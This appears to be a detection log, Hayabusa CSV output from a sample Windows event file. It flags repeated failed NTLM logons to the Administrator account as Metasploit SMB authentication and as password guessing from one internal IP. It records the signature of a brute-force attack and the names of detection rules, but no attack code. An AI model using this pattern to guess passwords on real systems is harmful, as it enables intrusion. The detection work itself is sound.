+2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lE8kvmcQtCmlsqtT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IXmfjxrGC3liZ2oh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 72JLcUBrhOoXPLzD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sRoFpK2ZvBYy4jGM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9KReiI3k2WIKpxFq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wsfSzPbji6ARhU0k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: axeCxygvJ4zL4Xoq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y64sc51Y7vbiFTIQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o395tRQcfRBTTCSF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K1R4wlYWS4SkM3dF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RsZy0Yjvk720Mu22  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c8RusStjhReKBmS0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eJuPYLTcGaGvErLg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: raCbua01mzU1Djuf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Fnt8atAbMtxXivUs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: psokvQJyMn5m5rMh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wTPGqOITsOhpTgIF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xxhGrLzhwNziihc9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UIb1lHuPaC62UlBp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2uvXuLIR9yvmWngF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MI35CCybjNtntfwo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0GTJfOkk0fUC5YCX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jk6PsiAiLPsHGUh1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KeGDMp9My5eLJz55  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.496 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BvDQphjvwOCsNQqB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sbJhad4aocvPMYVP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJl3XqTUxvqiKKaG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a1fAJDfguuoNxWiR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: daAeGcsqoqERsEu6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0iynnwxS8v4C5b3E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2kU7IS4XCvgRpTff  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MBC8AJXBQHrCMrO2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NSGraDQmI4MAq9Ls  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B7u2Pb9y8hB0iYWh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A657rbd6k4AD7M4i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7rkiDUBuTCU2jDXR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jjsCFTQoobrkQoWF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2dNXav95nZyBhVOc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yeq1x56Ct6R2Nu3J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pUwyCNtwydEQu2bd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bX7eihAOk3PUgbwM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WPXqAsaYaXEr8I9L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4SaEmIpmlH1VMDun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a3Dvp43a2h7Mzx2H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g3voKlRXc7rIaIYs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
